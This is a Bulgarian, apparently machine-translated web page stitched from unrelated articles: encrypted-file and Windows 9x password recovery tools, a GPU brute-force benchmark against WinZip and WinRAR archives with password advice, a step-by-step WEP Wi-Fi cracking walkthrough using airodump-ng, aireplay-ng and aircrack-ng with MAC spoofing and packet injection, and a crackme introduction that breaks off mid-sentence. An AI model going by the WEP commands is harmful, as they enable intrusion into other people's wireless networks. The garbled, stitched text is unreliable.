Как да хакнете Wi-Fi мрежа с WEP криптиране. Хакване на шифрованата файлова система Как работи Bitlocker

За хакване на Encrypted Файлова система(EFS) може да се използва софтуерРазширен EFS Възстановяване на даннипроизведени от Elcomsoft. Демо версия на този софтуер е достъпна на http://www.elcomsoft.com/aefsdr.html

Стартов прозорец на програмата

Фигура 3. Прозорец за разширено възстановяване на данни на EFS

Програмата може да дешифрира защитени файлове само ако ключовете за криптиране (не всички, но поне някои от тях) все още съществуват в системата и не са променени.

За файлове, криптирани под операционна система Windows 2000, ако ключът на базата данни на акаунта (SYSKEY) се съхранява на флопи диск или ако е зададена опцията „Стартиране с парола“, трябва да знаете една от следните пароли, за да можете за дешифриране на файловете:

парола за стартиране или дискетастартиране

паролата на потребителя, който е шифровал файловете

Парола за агент за възстановяване (ако е възможно)

Ако компютърът е бил част от домейн, когато файловете са били шифровани, в някои случаи може да не успеете да дешифрирате файловете. Ако паролата на потребителя (който е шифровал файловете) е била променена след шифроването, може да се наложи да въведете старата парола в програмата.

Кракване на пароли за Windows 9x

Не забравяйте обаче, че има много по-лесен начин за разбиване на мрежови пароли. Тъй като в повечето организации днес операционната система на клиентската машина е Windows 95/98, съответно е много по-лесно да се организира хакване на защитата с парола на тази операционна система, тъй като паролата в такъв файл се съхранява само в главни букви (главни букви), знаейки, че това е много по-удобно и по-лесно да изберете по-късно необходимата мрежова парола.

Има голям брой програми за разбиване на пароли за Windows 95/98, но нека се съсредоточим върху най-популярната от тях, PwlTool 6.0, на примера на която беше проведено изследването.

Фигура 3 показва основния работен прозорец на тази програма, предназначена за работа на компютри, работещи под Windows 95/98, Windows NT/2000.

PwlTool е набор от инструменти за възстановяване на пароли. Основната програма е RePwl. Тази програма ви позволява да възстановите понякога забравена или изгубена парола за влизане в Windows 95 (оригинална версия и OSR2) и Windows 98. Освен това ви дава възможност да преглеждате пароли, записани в PWL файл.

Какво е pwl файл?

Windows 95/98 съхранява паролата в PWL файл. PWL файловете могат да бъдат намерени в Windows директория. Техните имена обикновено се съхраняват като USERNAME.PWL. PWL файлът е криптиран и не е лесно да се извлекат пароли от него. Първият алгоритъм за криптиране на версията на Windows 95 е създаден по такъв начин, че е възможно да се създават програми за дешифриране на PWL файлове. Във версията OSR2 обаче този недостатък е отстранен.

Оценка на надеждността на pwl файлове.

Системата за защита с парола в OSR2 е професионална и надеждна по отношение на криптографията. Но въпреки това той съдържа няколко сериозни недостатъка, а именно:

всички пароли се преобразуват в главни букви, което значително намалява броя на възможните пароли;

алгоритмите MD5 и RC4, използвани за криптиране, позволяват по-бързо криптиране на пароли, но надеждно парола за windowsтрябва да съдържа най-малко девет знака.

Системата за кеширане на пароли по своята същност е ненадеждна. Паролата може да бъде запазена само ако неоторизиран персонал няма достъп до вашия компютър.

Въведение

Когато забравите ключовете си в колата и вратите се заключват автоматично, това не изглежда смешно. Последният път, когато това се случи на един от нашите служители, той трябваше да прекара по-голямата част от деня в чакане на ключар. За щастие можем да ви успокоим: този човек направи такава грешка само веднъж и оттогава никога не е изпускал ключовете си от поглед.

Най-смешното е, че при цялото им съзнание и предпазливост е просто невъзможно да се проследят техните електронни ключове(пароли), когато използваме компютър. Просто стават все повече и повече, защото е известно, че не трябва да използвате една парола за всички случаи. Обикновените ключове за къща или офис са много по-лесни за проследяване. Дори когато се изгубят, те все пак се озовават някъде. Просто трябва да проследите пътя си в обратен ред. Е, или в последна инстанцияобадете се на специалист (например ключар), който ще ви помогне да преодолеете препятствие под формата на ключалка на вратата.

Същото се случва, когато става дума за пароли, поне до определен момент. няма значение, електронна пощаили банкова сметка - обикновено възстановяването на парола в интернет е лесен процес. По правило сайтовете имат връзка "Забравена парола?" („Забравена парола?“), която ви позволява да влезете отново в акаунта си. Въпреки това, когато става въпрос за криптирани файлове, изгледите обикновено не са толкова розови. Наскоро се сблъскахме с такъв проблем, докато се опитвахме да получим достъп до стар криптиран WinZip архив.

Преди да се задълбочим в проучването на проблемите с възстановяването на пароли, бих искал да отбележа, че има много начини да защитите вашите данни. Ако имате нужда от цялостно решение, можем да ви предложим програма като TrueCrypt (вижте статията „Защитете данните си! Анализ на производителността на TrueCrypt 7.0a“), което сега е още по-привлекателно, защото поддържа AES-NI. И все пак криптирането на архиви остава най-разпространеният начин за защита на данните. Независимо дали сте служител в отдела за човешки ресурси, изпращащ седмични ведомости за заплати, или холивудска актриса, която се опитва да запази личните си снимки на iPhone в безопасност и сигурност, криптирането на архивите е бързо и лесно за вас. лесен начинзащита.

Има обаче разногласия относно това колко добре са защитени вашите данни. Ако сте прекалено загрижени за сигурността на вашата информация, тогава най-вероятно ще харесате най-силния от всички възможни програмикриптиране. Вероятно бихте предположили, че колкото по-мощен е софтуерът за криптиране, толкова по-трудно е да се разбие файл, криптиран от този софтуер, и че криптирането AES-256 е по-добро от AES-128. Но не е така. Мислете за криптирането като за един вид голям сейф. Колкото по-дебели са стените, толкова по-трудно е да се проникне. Защитата на един сейф обаче е толкова добра, колкото е добра бравата, която го защитава. Паролата работи по същия начин. Това е ключът към трезора. Колкото по-дълга е вашата парола, толкова по-сложна е вашата ключалка и по-сигурни са вашите данни.

Повечето потребители приемат, че осемцифрените пароли са достатъчно сложни, за да се провалят хакерите. Но това не е съвсем вярно и ще ви кажем защо.

Тестова конфигурация

Важно е да се отбележи, че WinZip програмапредлага три различни опции за криптиране: Zip 2.0, AES-128 и AES-256, както и няколко схеми за компресиране. WinRAR е много по-опростен в това отношение: предлага само AES-128 криптиране и различни нива на една и съща схема за компресиране. Тествахме различни вариантиза да ви покажа как те влияят на скоростта на разбиване на пароли.

Криптиране на архив: WinZip и WinRAR

Данните в криптиран файл, като WinZip или WinRAR архив, обикновено са по-малко защитени от информацията на напълно криптиран диск. Затова говорим за различни понятия.

Компресирането на данни е актът на обвиване на файл или поредица от файлове в контейнер и премахване на излишни информационни битове, за да се запази област от паметта. Можете да видите истинската разлика само като сравните файловете с всеки шестнадесетичен редактор. Имайте предвид, че ще има по-малко редове поради компресията.

Разбира се, идеята за файлов контейнер е това, което също ви позволява да отворите шифрован WinZip файл. Контейнерът не е криптиран, но съдържанието е. Това означава, че нямате нужда от парола, за да видите съдържанието на архива. Имената на файловете не са защитени.

Програмата WinRAR използва същата концепция. Но тук имате възможност да шифровате имена на файлове. Това може да стане чрез осигуряване на достъп до целия контейнер. Като се има предвид това, вие дори не можете да отворите файла, ако нямате паролата.

Имената на файловете са част от така наречените метаданни. Това е като данни за данни и това е единствената характеристика, която отличава WinRAR от WinZip. Последният ви позволява да видите съдържанието на криптирания архив, тъй като първият може да съхранява метаданни.

Това само по себе си не прави непременно WinRAR по-сигурна програма. Но постоянните кракери на пароли се опитват да използват метаданните, защото те обикновено не са криптирани. След като откриете слабости, можете да предприемете действия, за да използвате слабостите в начина, по който се прилага криптирането.

Не трябва да се притеснявате твърде много, ако паролата ви е сложна и използвате добра схема за криптиране (AES-128 или AES-256). В същото време, ако не искате другите да знаят какво сте шифровали с WinZip, използвайте неописателни имена на файлове вместо нещо като „2011 1040 отчет за приходите“. Разбира се, силната защита ще отсече и двата метода. Ако направите имената на файловете незабележими, няма да разберете какво има в шифрования файл, докато не бъде напълно дешифриран. Обикновено, ако направите достъпа по-малко удобен, това ще означава, че той също ще стане по-малко удобен за вас.

И така, какво се случва, когато, като се вслушате в нашето предупреждение, „затегнете гайките“ на всичките си цифрови ключалки и след това забравите как да ги отворите отново?

Проверка на дължината на паролите

Възстановяването на парола може да бъде доста сложен процес. Шифроването може да се сравни със судоку пъзел. Колкото по-голям и по-сложен е пъзелът, толкова по-трудно е да се заобиколи схемата за криптиране. Има обаче два начина да опитате това.

Обикновено по време на първия хакерите се опитват да намерят някакъв общ модел. Този метод може да бъде разделен на няколко различни класа атаки, за някои от които може да сте чували в новините, като например атаки от страничен канал. Тези методи са сложни и не са от вида, използван от обикновените компютърни потребители. Само малка група хора знаят как да ги прилагат и прилагат.

Много по-примитивен подход за заобикаляне на криптирането е просто „познайте и проверете“. Този метод е известен като метод на подбор. Представете си, че изброявате всяка една комбинация от числа, която може да се използва за решаване на горния пъзел судоку, от използване на единици във всички посоки до всички деветки. Има начини да скриете "проверката", за да направите атаката по-сложна. Но такива прости програмикато WinZip и WinRAR нямат това предимство. Ако сте упорити, можете да продължите да гадаете пароли, докато ракът на планината не изсвирне. Няма ограничение за броя опции, които можете да изпратите за преглед. По този начин истинският проблем с възстановяването на паролата е скоростта, с която можете да познаете правилната опция.

Ръчната проверка на паролите е в най-добрия случай тъп опит, особено ако имате работа с дълга парола. Тук влизат в действие програмите за възстановяване на парола. Те автоматизират процеса на "отгатване" на пароли.

Атаките с груба сила се основават на вероятност. Колкото по-дълга е паролата, толкова повече пароли за проверка. Тук те разчитат на идеята за пермутация, тоест подреждане на обекти в определен ред. Представете си, че паролите са анаграми. Ако ви дадем буквите a, b и c, колко различни подредени подредби можете да направите? Само с три букви можете да направите шест пермутации на набора (a,b,c), а именно: , , , и .

Изчисляването на броя на възможните пароли е лесно. Повторенията са разрешени, така че формулата ще бъде: n(дължина на паролата), където n е броят на възможните знаци. Както можете да видите, с шест знака вече имаме работа с милиарди опции, ако паролата включва малки и главни букви. Ако сте използвали и специални знаци и цифри (всички ASCII знаци (Американски стандартен код за обмен на информация)), тогава ще откриете, че броят на кандидат паролите ще се увеличи драстично до? трилиона (10 на 12-та степен). И не забравяйте, че ако не знаете дължината на вашата парола, ще трябва да опитате всяка възможна комбинация, като започнете с парола от един знак, докато стигнете до паролата по ваш избор.

Разбирате ли какво имаме предвид?

Кракване на пароли: CPU базирани компютри

Има безброй програми, от които да избирате, за да ви помогнат да възстановите вашите пароли, но двете най-популярни се наричат ​​Advanced Archive Password Recovery и Visual Zip Password Recovery Processor. Когато загубихме паролата за един от WinZip файловете, успяхме да видим в действие първата програма, която възстанови парола от седем знака за 20 минути. Но това ни даде повод за размисъл и събуди любопитството ни. Колко бързо компютърът ни търсеше пароли? Какво би се случило, ако използваме по-силен метод за криптиране като AES-128?

По-важното е, че следващият въпрос е: наистина ли отнема само 20 минути, за да отворим всички наши архиви, защитени с парола, и след това те ще бъдат достъпни от някой, който не би трябвало да има достъп до тях?

Както можете да видите, компресията само леко влияе върху скоростта, с която можете да се опитате да отгатнете пароли, но най-големият недостатък е стара схема Zip 2.0 криптиране. В резултат на това парола от пет знака може да бъде намерена само за няколко секунди, тъй като можете да обработвате данни със скорост от около 28 милиона пароли в секунда, като използвате ядрен процесор i5-2500K. Visual Zip също е намерен правилна паролаизползвайки метода за криптиране Zip 2.0, но поради проблеми със софтуера, тази помощна програма не успя да възстанови паролата на файл, криптиран с AES-128.

Разбира се, това не е цялата история. Не се интересуваме от производителността на процесора само за да се хвалим с това, което може да направи един нов процесор (въпреки че това всъщност може да ни доведе до интересен бенчмарк). И затова се тревожим за производителността на процесора, защото тя влияе върху скоростта, с която можем да намерим паролата.

Дори ако приемете, че можете да опитате да обработите 28 милиона пароли в секунда, шансовете ви да познаете правилната парола ще стават все по-неясни, докато преминавате към по-дълги пароли и набори от знаци. Да прекарате цял месец в опити да разбиете парола от осем знака, от които всичките осем са букви, не е толкова ужасна перспектива, ако защитената информация е наистина важна. Но 700 милиона години са твърде голяма цифра, за да чакате.

За щастие, Advanced Archive Password Recovery ви позволява да спрете процеса на пауза и да запазите позицията, където търсенето е прекъснато. И ако имате няколко домашни компютъра на ваше разположение, тогава можете значително да намалите времето за търсене, като разпределите количеството работа между тях. Страхуваш ли се вече?

Кракване на пароли: GPGPU технология

Разбиване на пароли: CPU i5-2500K.

Целта на атаката с груба сила е бързо да се форсират максимален брой пароли. Но съвременните процесори не са добре оптимизирани за това. Докато нашата работна станция Sandy Bridge може да обработва около 28 милиона пароли в секунда, тя все още не използва всички налични цикли на процесора. Не забравяйте, че ние само гадаем и проверяваме. Горната екранна снимка на данните за използването на процесора илюстрира това: докато тактовата честота, разбира се, помага в този процес, програмата може да се възползва от паралелизма, така че наличието на повече ядра ще помогне за ускоряване на процеса на търсене на парола.

Както знаем, когато става въпрос за паралелно изпълнение на задачи, което процесорите понякога се справят много добре, аритметичните логически модули на видеокартата в повечето случаи могат да работят по-добре. AMD и Nvidia имаха цели екипи за транскодиране на видео, които бяха сигурни в това, докато Intel не доказа, че няколко специализирани логически вериги в неговата архитектура Sandy Bridge могат далеч да надминат тежък GPU. Но сега се оказва, че имаме друго приложение, което е идеално подходящо за работа на съвременни графични процесори.

Имаше време, когато кракването на пароли с помощта на технологията GPGPU (Общи графични процесори - изчисления с общо предназначение на GPU) не надхвърляше научния свят: завършилите студенти полагаха големи усилия да работят с специални програмикоито никога не са намирали търговска употреба. Но сега всичко се промени. Понастоящем има две помощни програми GPGPU, които всеки с кредитна карта: Parallel Password Recovery и Accent Password Recovery.

Parallel Password Recovery е програма, изключително оптимизирана за паралелната изчислителна архитектура CUDA на Nvidia. Не казваме, че CUDA ядрата са по-добри от разработката Stream на AMD. Все пак трябва да се отдаде дължимото на Nvidia. Неговата "инвазия" в областта на общите компютри с помощта на GPU започна отдавна и компанията предостави на разработчиците достъп до множество библиотеки от ниско ниво, необходими за изучаването на тази технология. AMD отмъсти много по-късно. Всъщност все още се сблъскваме с някои проблеми, когато използваме ускоряването на потока, включено в популярни приложения за транскодиране. Това отчасти обяснява защо друго решение, Accent Password Recovery, все още клони към разработките на Nvidia. Докато тази помощна програма разпознава CUDA и Stream, само хардуерът на Nvidia е оптимизиран за проникване в Zip 2.0 криптиран файл.

И между другото, каква скорост има криптирането Zip 2.0! С графичната карта GeForce GTX 460 вече можем да отгатваме пароли със скорост от около 500 милиона комбинации в секунда. За да ви дадем по-добра представа какво означава това, нека кажем, че можем да познаем всяка от възможните комбинации от ASCII знаци за парола с дължина от един до 7 знака за по-малко от 48 часа. Що се отнася до паролата от осем знака, тук ще говорим за 168 дни.

Несъмнено Zip 2.0 е много остарял алгоритъм за криптиране. WinZip го поддържа само от съображения за съвместимост. Стандартът AES е новият „фаворит“, към който всички се стремят. Тази схема е много по-трудна за използване в паралелни задачи, въпреки че разработчиците на софтуер, разбира се, правят такива опити.

Производителността страда особено, когато започнем да се опитваме да възстановим парола, криптирана с AES. курсора на мишката в нашия тестова системабуквално започна да се "спъва". Атаките с груба сила срещу криптирани с AES файлове са доста бавни. Ще отнеме повече от 13 години, за да изпробвате всички възможни комбинации от ASCII знаци за парола с дължина от 1 до 7 знака.

Изчисленията на общия план с помощта на GPU са свързани с феномена на паралелизма и следователно, ако един от вас има 480 CUDA ядра на видеокартата, тогава ако комбинирате ядрата от две карти, получаваме стойност от 960, която трябва да бъде много по-добре, нали?

Когато сдвоим две графични карти GeForce GTX 570 заедно и активираме SLI, криптирането Zip 2.0 вече не изглежда сигурно. Благодарение на оптимизирания код можем да проверяваме 1,5 милиарда пароли в секунда. Дори изглежда малко абсурдно. Сега намалихме времето за търсене на пароли от един на осем знака, използвайки всички ASCII знаци, до почти два месеца.

Междувременно AES защитата все още изглежда много привлекателна. Ако паролата се състои от повече от седем знака, тогава трябва да прекарате почти пет години, заменяйки комбинации със скорост от 500 000 пароли в секунда.

Nvidia срещу AMD: Ефективност на атака с груба сила

Този малък пример е свързан с мащабиране. Искате ли да имате много ядра и да са бързи? Въпреки че това ще повлияе до известна степен на нашите резултати, нека оставим архитектурата настрана за момент. Докато две GeForce GTX 570 имат само 2,8 пъти повече CUDA ядра в една GTX 460, ние имаме три пъти по-висока производителност, тъй като всички графични карти от висок клас също работят с 8% по-бързо.

Що се отнася до GeForce GTX 590, получихме подобни резултати при SLI конфигурацията. Графичната карта 590 има повече ядра, но те са малко по-бавни. Ако търсите първокласна графична карта, тогава успехът на Nvidia е много по-забележим, като нейният 1024-ядрен модел CUDA оглавява списъка. В същото време, ако сте готови да се примирите с висока температура и висока цена, две GeForce GTX 590s в SLI конфигурация трябва да надминат две GTX 570s с фактор два.

За сравнение, има 3072 Stream процесори, работещи на 830 MHz на най-добрата графична карта на AMD, Radeon HD 6990. Не забравяйте, че ядрото на AMD не е подобно на това на Nvidia, така че не можем да ги сравним и съпоставим като 1:1.

Имахме време да стартираме няколко Radeon HD 5850 в CrossFire, но въпреки това резултатите бяха впечатляващи. С 2880 Stream процесори, ние разбивахме около 1,1 милиона пароли в секунда, опитвайки се да разбием AES-128 криптиран WinZip файл. Две графични карти Radeon HD 6990 - това е вероятно най-добрият изборако искате да използвате пълния потенциал на компютъра си, докато възстановявате вашата AES парола. Но дори и при най-оптимистичния сценарий ще можете да работите със скорости, малко по-високи от 3 милиона пароли в секунда. Това все още не е достатъчно, за да разбиете парола от осем знака за по-малко от година.

Чифт GeForce GTX 570s в SLI конфигурация е правилният набор за гледане в компютър за игри. Макар че вероятно не очаквате възстановяването на стари пароли, по-дълги от седем знака, да отнеме много време, не забравяйте, че все пак говорим за най-лошия сценарий. Сякаш търсим парола между 00 и 99, а верният отговор се оказва 99. Обикновено не се стига дотук и паролата е някъде по средата при търсене.

Програмите за възстановяване на пароли като изброените по-горе не извършват пълно последователно търсене, защото не е твърде добра стратегияза да възстановите паролата си. Всъщност успешното възстановяване най-вероятно ще се случи някъде по средата на търсенето. Въпреки това, предоставяйки времевата рамка, пред която сме изправени, не променихме заключението, до което стигнахме. Според нас криптирането Zip 2.0 е абсолютно ненадеждно. Въпреки че ще отнеме много време, за да разберете парола от 9 или 10 знака, това определено е нещо, с което няколко геймърски приятели могат да се справят.

Проблеми със сигурността: WinZip и WinRAR

Паролите не дешифрират директно криптирани файлове. Трябва да генерирате ключ за дешифриране от оригиналната парола и точно за това говорихме на предишните няколко страници. Това е мястото, където се натъкнахме на пречка за атаки с груба сила. Генерирането на ключ отнема 99% от общото време за дешифриране, така че използването на този мощен хардуер е подходящо единствения начиннамалете времето за разбиване.

Въпреки че и двете програми - WinZip и WinRAR - използват SHA-1 трансформации за извличане на ключове, механизмите на всяка програма са малко по-различни един от друг. WinZip е базиран на PBKDF2 (функция за извличане на ключове, базирана на парола 2.0) и използва производни трансформации на 2002 SHA-1 за генериране на ключа. Тази стойност обаче е постоянна за пароли с всякаква дължина (до 64 знака), поради което парола от 10 знака с криптиране AES-256 е също толкова лесна за разбиване, колкото и с AES-128.

За сравнение WinRAR използва собствена схема за извличане на ключове, която изисква (дължина на паролата * 2 + 11)*4096 SHA-1 трансформации. Ето защо е необходимо повече време за кракване на криптирани WinRAR архиви чрез груба сила.

На практика е по-вероятно да забравите собствената си парола, отколкото вашият криптиран файл да попадне в ръцете на някой с твърде много свободно време и достатъчно мощен хардуер, за да разбие файла ви. Дори ако такъв нападател има най-добрия хардуер от всички налични опции, максималното време за намиране на парола от девет знака за AES-128 криптиран WinZip файл вече е над 1000 години. Въпреки това, вашите перспективи за възстановяване на парола са доста прилични, ако имате поне груба представа каква може да бъде вашата парола.

Например, ако си спомняте следната информация за вашата ASCII парола от 10 знака:

• Започва с "е";
• Завършва с "а";
• Не съдържа главни букви;
• Съдържа един знак "!";
• Не съдържа нито една от следните букви: B, C, D, Q, T, U, V, W, X, Y, Z.

Тогава ще трябва да търсите само между 1 трилион възможни пароли вместо 205 трилиона. Това е доста осъществима задача с двойка GeForce видео карти GTX 570. Ако сте използвали WinRAR архив, тогава нямате почти никаква надежда да възстановите паролата, освен ако не е кратка.

Заключение

След седмица опити да възстановим старата парола за WinZip, бяхме доста изненадани. Всички живеем в свят, в който защитената информация не е толкова сигурна, така че е трудно да не се притеснявате от GPGPU технологиите, тъй като нашите GPU стават все по-мощни.

В миналото нямаше начин да разберете парола от 10 ASCII символа за разумно време. Това беше възможно само с хардуер по поръчка. Точно това прави Electronic Frontier Foundation, когато през 1998 г. инвестира в своята специализирана машина Deep Crack. За крайна цена от около 250 000 долара група експерти по сигурността съставят машина, която може да сканира около 90 милиарда пароли в секунда, благодарение на повече от 1800 AWT-4500 чипа, работещи в тандем.

Не можем да постигнем същото ниво на производителност на нашите работна станция, но две графични карти GeForce GTX 570 в SLI конфигурация работят с около 1,5 милиарда пароли в секунда, ако имаме работа с Zip 2.0 криптиране. Това е 1/60 от производителността за по-малко от 1/100 от цената на тази известна машина. Очевидно сравняваме абсолютно несравними неща. Освен това криптирането Zip 2.0 е отхвърлено. Едно нещо е ясно: тежки архитектури графични процесорипаралелното изчисление ще продължи да настоява за повишена „плътност на производителността“ на все по-достъпни цени за масовия потребител, така че в един момент ще можем да си позволим 90 милиарда търсения на пароли в секунда на нашия настолен компютър.

И така, какво научихме? На първо място, ще стоим далеч от криптирането Zip 2.0. Това е наследена схема за криптиране и дори самият WinZip предлага да използвате AES за предотвратяване на груби атаки.

Целенасочените опити за хакване са друга история. Повечето хора използват пароли, които включват думи и следователно такива пароли са податливи на речникови атаки, без значение каква схема за криптиране използвате. Броят на думите в английския език е по-малко от 1 милион. Графичната карта GeForce GTX 460 обаче може да обработва най-малко 150 000 пароли в секунда с AES криптиране. Дори и да добавите няколко промени, отнема само един ден, за да разбиете заключването на думата и да познаете паролата. Защо? Да, защото цялата дума в функционален плане същото като една буква, като например "а".

В идеалния случай трябва да избягвате ситуации като тази, ако се опитвате да защитите вашите файлове:

• Не използвайте думи от речника. В Оксфордския речник на английски" (Оксфордският английски речник) съдържа по-малко от 300 000 записа, ако броите думите в текуща употреба, остарели и производни думи. За GeForce GTX 460 намирането на такава дума парола няма да е трудно;
• Опитайте се да не използвате думи, последвани от числа. Добавянето на 1 в края на паролата не я прави по-сигурна. Все още можем да разбием паролата ви, като прегледаме целия английски речник и всички комбинации от числа за половин ден, използвайки чифт графични карти GeForce GTX 570;
• Избягвайте двойни думи и прости замествания на букви. Опцията "PasswordPassword" само удвоява броя на думите, които трябва да сканираме. Също така парола като [имейл защитен]не е надежден. Кракерите на пароли знаят всички обичайни комбинации. Така че не избирайте този начин;
• Не използвайте общ последователен ред на вашата клавиатура. Не е толкова трудно да добавите "qwerty" към речника на паролите за проверка. Това е вторият начин, който не трябва да се следва;
• Не използвайте обичайните серии от числа. Може би 314159 е доста лесно за запомняне. Все пак това е "PI" число, но също така е и стойност, която е доста лесна за проверка;
• Избягвайте да използвате какъвто и да е вид лична информация, като регистрационен номер на колата ви, социалноосигурителен номер, бивш телефонен номер, дата на раждане и др. Живеем в свят, в който има много информация публичен достъп. Ако имате социален профил Фейсбук мрежиили Twitter, количеството информация, достъпна за трети страни, се увеличава още повече.

Схемата за шифроване на файл е толкова добра, колкото паролата, която защитава файла. Това е слабо място в симетричната парола, където ключът за криптиране е същият като този за декриптиране. Ако упорито продължавате да се притеснявате прекалено много за безопасността на вашите данни, най-вероятно нивото на сигурност на системата PGP (Pretty Good Privacy) или сертифицираното криптиране ще ви подхожда. За ежедневна употреба тази опция е неудобна, освен ако вие и вашата компания няма да преминете към PKZIP архиватор. Тогава дължината на паролата трябва да бъде основната ви грижа.

Ако използвате пълния ASCII набор от символи, силата на вашата парола ще бъде 94 (дължината на паролата), тъй като всеки допълнителен знак прави паролата 94 пъти по-сигурна. Като добавите няколко специални знака, вие ще направите разбиването на вашата парола „невъзможно поради огромното количество изчисления“ за хакери, които се опитват да атакуват файла ви с груба сила. Ако 7,298,831,534,994,528 възможни комбинации (в парола от един до девет знака) не са достатъчни, за да ви успокоят, използвайте парола от 10 знака и тогава хакерите ще могат да опитат и да избират от 699,823,827,359,474 784 комбинации.

Въз основа на тестовете, които направихме, вероятно можете да търсите комбинацията, от която се нуждаете, при малко над 3 милиона пароли в секунда за AES криптиран файл, като използвате чифт Видео карти Radeon HD 6990. Това означава, че ще отнеме 7397 години за търсене на пароли между един и 10 знака с помощта на ускорението на AMD Stream. Дори и да удвоите тази скорост, това няма да ви помогне много. За да кракнете файл за около година, ще трябва значително да увеличите усилията си - до 7397 машини, работещи денонощно.

В бъдеще е вероятно средният потребител да получи възможност за достъп до този клас изчислителна мощност с паралелно изчисление. Следващата стъпка ще бъде разпределеното изчисление. Parallel Password Recovery вече работи върху начин за прилагане на GPU-ускорена обработка на данни към множество клиенти.

IN този моменттова не е проблем, който ще ви държи будни през нощта. Както казва старата поговорка „има ли желание, ще има и възможност“. Откакто има ключалки, има и ключалки. Ако искате вашата информация да остане защитена, тогава трябва да разберете колко лесно (или трудно) е да вземете ключалка за ключалката си. Това правят помощните програми за възстановяване на парола. Изненадващо, разработчиците на WinZip са съгласни с нас по този въпрос. Том Вон, вицепрезидент на WinZip, заяви: „Виждам създателите на помощни програми за възстановяване на пароли като добри момчета, а не злодеи. Само софтуер, за който не знаете нищо, трябва да ви плаши (софтуер, разработен от „лошите“, който е по-бърз или се чупи по-добре, отколкото може да очаквате)".

Това може да звучи така, сякаш продаваме някаква ужасна информация или се опитваме да посеем недоволство сред читателите, но се надяваме, че ще запомните от тази статия, че не можете да купите наистина впечатляващ софтуер. Групите, работещи върху персонализирано криптиране, винаги се развиват по-бързо от тези, налични в търговски мащаб. И така, ако правите всичко възможно, за да гарантирате безопасността на вашите файлове, вашата парола трябва да отговаря на тези основни критерии:

• Да съдържа поне 9 знака;
• Съдържа поне една главна буква;
• Съдържат поне една малка буква;
• съдържа поне един специален характер, като например "@" или "!";
• Съдържа поне едно число.

Тези правила ще дадат шанс на файловете ви да устоят на атаката на програмите за разбиване на пароли. Хакерите имат неограничен брой опити да разбият парола. И следователно кракването на криптиран файл е само въпрос на време. Ето защо експертите по сигурността разбират, че истинската цел е да се откаже достъп до съответните данни. Ако ви отнеме 50 години, за да разбиете паролата за WinZip архива, който съдържа информация за това как сме продали нашите акции миналата седмица, тогава тази информациявече няма да е важно. Създавайте по-дълги, произволни пароли и тогава можете да се насладите както на нивото на защита на вашите данни, така и на спокойствие.

Как да хакна wifi? Много от нас са чували това при инсталиране WiFi горещи точкиПри никакви обстоятелства не трябва да избирате WEP криптиране, тъй като е много лесно да се разбие. Вероятно малцина са се опитали да го направят сами и около същия брой знаят как всъщност изглежда всичко. По-долу е даден вариант на хакване на точка с такъв протокол за криптиране, за да можете по-ясно да осъзнаете колко реална е ситуацията, когато някой се свърже с вашата супер секретна точка и какво представлява това хакване. Естествено, в никакъв случай не е възможно да използвате това на чужд рутер. Този материале само за информационни цели и призовава за изоставяне на лесни за кракване протоколи за криптиране.

За да хакне, нападателят ще се нуждае от:

• подходящ wifi адаптерс възможност за инжектиране на пакети (например Alfa AWUS036H)
• BackTrack Live CD
• всъщност твоята гледна точка WiFi достъпс WEP криптиране, на което ще бъде настроен експериментът
• търпение

След стартиране командна линия BackTrack, наречен Konsole, трябва да въведете следната команда:

Ще видите вашите мрежов интерфейс, който ще се нарича "ra0" или нещо подобно. Запомнете това име. В бъдеще той ще бъде наричан (интерфейс) и вие го заменете с вашето име. След това въведете 4 реда последователно:

спиране на airmon-ng (интерфейс)
ifconfig (интерфейс) надолу
macchanger --mac 00:11:22:33:44:55 (интерфейс)
airmon-ng старт (интерфейс)

Сега имаме фалшив MAC адрес. Въведете:

airodump-ng (интерфейс)

Списък с налични безжични мрежи. Веднага щом се появи в списъка желаната мрежа, можете да натиснете Ctrl+C, за да спрете търсенето. Трябва да копирате BSSID на мрежата и да запомните канала (колона CH). Също така се уверете, че WEP е посочен в колоната ENC.

Сега започваме да събираме информация от тази мрежа:

airodump-ng -c (канал) -w (име на файл) --bssid (bssid) (интерфейс)

канал е каналът от колоната CH, името на файла е името на файла, в който ще бъде записано всичко, а bssid е идентификаторът на мрежата.

Ще видите нещо подобно на показаното на екранната снимка. Оставете този прозорец както е. Отворете нов прозорец на Konsole и въведете:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (интерфейс)

essid - SSID име на жертвената мрежа.

Очакваме съобщението „Асоциацията е успешна“.

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (интерфейс)

Сега трябва да покажете цялото си търпение и да изчакате, докато числото в колоната #Data премине знака от 10 000.

Когато бъде достигнато необходимото количество събрани данни, отворете третия прозорец на Konsole и въведете:

aircrack-ng -b (bssid) (име на файл-01.cap)

Името, което сте избрали по-рано за файла, се въвежда като име.

Ако успеете, ще видите реда "KEY FOUND", който съдържа ключа към мрежата.

ВЪВЕДЕНИЕ

Кракми го
програма (обикновено малък размер 1-2
килобайт), на който трябва да познаете паролата
или направете ключ. Кракми обикновено се пише
за проверка на нивото на познания на хората в областта
криптографски и хакерски програми. Крак ми
идва от английската фраза Crack Me -
разби ме.

по някакъв начин за мен
беше необходимо да се вмъкне поддръжка за "регистрация"
ключове за един комерсиални програми. На
онзи момент на опит по този въпрос, който имах
доста, по някакъв начин се опитах да хакна
няколко crackme, но нищо не проработи и аз
хвърли бързо. Но когато дойде стимулът, аз
Реших да започна с crackme и сега го правя
изучаване на различни алгоритми за криптиране
данни (като DES, TWODES, RSA и други). Съвсем
възможно е следващите ми статии да са за
алгоритми за криптиране,
използването на тези алгоритми е значително
увеличава времето, прекарано в хакване.

ВИДОВЕ CRACKME

Имайки в предвид
различни пукнатини, откроих две основни
видове: криптирани с кракове и съдържащи
просто алгоритъм.

Декодер
Krakmi от първия вид обикновено съдържа
много „трикове“ за отстраняване на грешки (сложност
на тези техники зависи от нивото на знания
човекът, който е написал krakmi, най-много
общите трикове лесно се заобикалят
хора и дебъгери, работещи под
защитен режим и преди
за да започнете да анализирате алгоритъма, трябва да получите
дешифриран код. Колкото по-трудно
дешифрирайте, (най-вероятно) по-трудно
ще има алгоритъм за избор на парола (или пароли)
на него. Много често се оказва, че
алгоритъм от 300 байта може да бъде по-труден за разбиване,
отколкото да дешифрира krakmi. Без знания
математиците също не съветват разбиване на пукнатини
които използват алгоритъма RSA (алгоритъм
криптиране на данни с публичен ключ) или
подобен. Естествено, по-добре е да започнете
некриптирани кракове. Аз също не препоръчвам
опитвайки се да пробия crakmi от групи UCL, UCF, rPG, SOS
- Само си губиш времето.

В някои
От Krakmi се изисква да разбере не паролата, а
